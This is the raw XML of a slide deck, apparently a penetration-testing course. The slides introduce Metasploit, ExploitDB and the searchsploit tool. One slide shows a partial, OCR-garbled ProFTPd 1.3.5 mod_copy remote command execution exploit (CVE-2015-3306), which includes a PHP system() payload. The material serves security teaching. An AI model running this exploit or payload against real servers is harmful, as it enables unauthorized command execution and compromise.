            <wp:docPr id="51247" name="Picture 5124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247" name="Picture 51247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784860" cy="2133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3600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="37BE2E8E" wp14:editId="160CD21C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1981200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2682240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1607820" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340736" name="Picture 34073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736" name="Picture 340736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1607820" cy="38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4624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="04E52B75" wp14:editId="66C0CC37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>350520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3977640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1051560" cy="220980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51267" name="Picture 5126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267" name="Picture 51267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1051560" cy="2209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5648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0D675A56" wp14:editId="51014E7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2400300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4008120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="853440" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51260" name="Picture 5126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260" name="Picture 51260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85344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0"/>
        </w:rPr>
        <w:t>As you know, Metasploit is written in Ruby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12148FB1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="403" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You can read the code to better understand how the module works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D9382B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="36" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="394" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>These are often more reliable than</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C8C4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="96" w:after="314"/>
        <w:ind w:left="2158" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>other scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF7F80" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="550" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>but sometimes you are not allowed to use Metasploit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB324E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId47"/>
          <w:headerReference w:type="default" r:id="rId48"/>
          <w:footerReference w:type="even" r:id="rId49"/>
          <w:footerReference w:type="default" r:id="rId50"/>
          <w:headerReference w:type="first" r:id="rId51"/>
          <w:footerReference w:type="first" r:id="rId52"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="804" w:right="1680" w:bottom="165" w:left="1464" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F85CE40" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Multiple results and findings are not a bad thing!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B464703" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="322" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>We've seen three different results for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve"> one service and potential exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321F2F28" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="208" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>This helps us determine possible avenues for attacking a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7160EF0A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>You can use all of the different resources to determine what works best.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF46D9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="91"/>
      </w:pPr>
      <w:r>
        <w:t>ExploitDB Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0DC22E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="292" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="19" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>The exploit database maintains code to take advantage of vulnerabilities so you don't have to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF4643" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="331" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="16" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3A2CE28F" wp14:editId="66FC56EC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28975" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="54552" name="Picture 5455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552" name="Picture 54552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3228975" cy="5600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4"/>
        </w:rPr>
        <w:t>To stay on top of the latest exploits that are released daily, keep tabs on their Twitter account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65975360" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>https://twitter.com/ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79667E4F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="331" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="16" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Additional resources can be fou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>nd within the original ExploitDB and Offensive Security websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08A73D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
        <w:ind w:right="3195"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="52"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>https://www.exploit-db.com/ https://www.offensive-security.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304C9D2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="132"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What if your assessment has no Internet access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF3E1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="156" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>ExploitDB also offers a command-line utility to search their database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE49DC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="216" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> take a copy of ExploitDB with you wherever you go!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07242B4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The tool lets you perform offline searches on a local copy of the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E1386" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>If you are running the standard Kali Linux build, it is available by default!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785FBA64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="61" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Introducing searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E8FCF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799F86CE" wp14:editId="78037C53">
            <wp:extent cx="11087100" cy="4724400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340742" name="Picture 34074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742" name="Picture 340742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11087100" cy="472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5FA6E2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>searchsploit is very intuitive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91E5CC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="437" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You can use any number of search terms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012997B5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="248"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>By default, search terms are not case-sensitive &amp; order does not matter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADB101" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Remember the biggest advantage is that you can use this utility from the command-line and offline without inter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C3A53" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>The tool offers a local path for exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380641A8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38C58725" wp14:editId="0CDE6E30">
                <wp:extent cx="11087100" cy="4533900"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="333658" name="Group 33365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087100" cy="4533900"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11087100" cy="4533900"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340744" name="Picture 340744"/>
                          <pic:cNvPicPr/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87100" cy="442912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5150" name="Rectangle 65150"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8486775" y="4248150"/>
                            <a:ext cx="557403" cy="3800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1053606" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:sz w:val="66"/>
                                </w:rPr>
                                <w:t xml:space="preserve">as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5151" name="Rectangle 65151"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="8905875" y="4248150"/>
                            <a:ext cx="1912906" cy="3800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61ABEAD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                  <w:sz w:val="60"/>
                                </w:rPr>
                                <w:t>expected!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8C58725" id="Group 333658" o:spid="_x0000_s1026" style="width:873pt;height:357pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="110871,45339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/pF/Z5/&#10;5AVex145+zz/AMgKvY6ACiiigAooooAKKKKAP5V6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D9yPgrNAukfNHXpslxZ7MCFi&#10;+fWvJvgy/wDxKa9HdvmX607ga19LZ+YC0LAlB3qjHJY5ffEwHbmnalzJH/1zFZ8jbAW9KYrmrarZ&#10;/YbvaWTjHWoLXS47xgRcK0ajJU9qitlaSwu3EZZfl6UySVLHTImIKtMxFAE91DPMuyBlNsvAC8E/&#10;Ws42My8CHioIbxQu2J33egqi19cKzDzpBz0pjPwboooq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40744" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:110871;height:442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">
                  <v:imagedata r:id="rId56" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 65150" o:spid="_x0000_s1028" style="position:absolute;left:84867;top:42481;width:5574;height:3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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="31053606" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="66"/>
                          </w:rPr>
                          <w:t xml:space="preserve">as </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 65151" o:spid="_x0000_s1029" style="position:absolute;left:89058;top:42481;width:19129;height:3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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="161ABEAD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="60"/>
                          </w:rPr>
                          <w:t>expected!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63118E67" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId57"/>
          <w:headerReference w:type="default" r:id="rId58"/>
          <w:footerReference w:type="even" r:id="rId59"/>
          <w:footerReference w:type="default" r:id="rId60"/>
          <w:headerReference w:type="first" r:id="rId61"/>
          <w:footerReference w:type="first" r:id="rId62"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="2040" w:right="1440" w:bottom="180" w:left="1464" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3390E8C6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1464" w:right="17535"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4C35CF73" wp14:editId="47644877">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>876300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="11306175" cy="5600700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340745" name="Picture 34074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745" name="Picture 340745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11306175" cy="5600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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EC839" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="61" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Understanding this Exploit (1/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589419CF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="180"/>
        <w:ind w:left="7596" w:right="-1230"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D3CE754" wp14:editId="54836325">
            <wp:extent cx="6162675" cy="28575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340747" name="Picture 34074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747" name="Picture 340747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6162675" cy="28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pPr w:vertAnchor="text" w:tblpX="7589" w:tblpY="-81"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9776" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="64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9776"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="5AE5DE58" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="7200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9776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</w:tcPr>
          <w:p w14:paraId="44AEF1A4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># Title: ProFTPd 1.3.5 Remote Command Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0678F972" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve"># Date </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>. 20/04/2015</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A064E39" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t># Author: R-73eN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF3C94F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="70"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t># Software: ProFTPd 1.3.5 with mod_copy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397EA50E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t># Tested . Kali Linux I.e6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8EDD42" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="158"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve"># CVE </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>. 2015-3306</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65CAF847" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="173" w:right="919" w:hanging="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t># Greetz to Vadim Melihow for all the hard work import socket import sys import requests socket . socket(socket .AF_INET, socket . SOCK_STREAM) if(len(sys.argv) &lt; 4) :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A3AAB0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="62" w:line="267" w:lineRule="auto"/>
              <w:ind w:left="173" w:right="19" w:firstLine="660"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">print '\n Usage exploit. py server directory cmd' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD7F52F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1613" w:right="769" w:firstLine="15"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">server = sys.argv[l] *Vulnerable Server directory = sys.argv[2] # Path accessible cmd - sys. argv[3] #PHP payload to be executed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">evil = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>'&lt;?php system("' + cmd + "' )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F8FC0BE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="225" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both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8720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F7F765B" wp14:editId="67EC5AD2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-91439</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1457325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3219450" cy="981075"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="334201" name="Group 33420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19450" cy="981075"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3219450" cy="981075"/>
                        </a:xfrm>
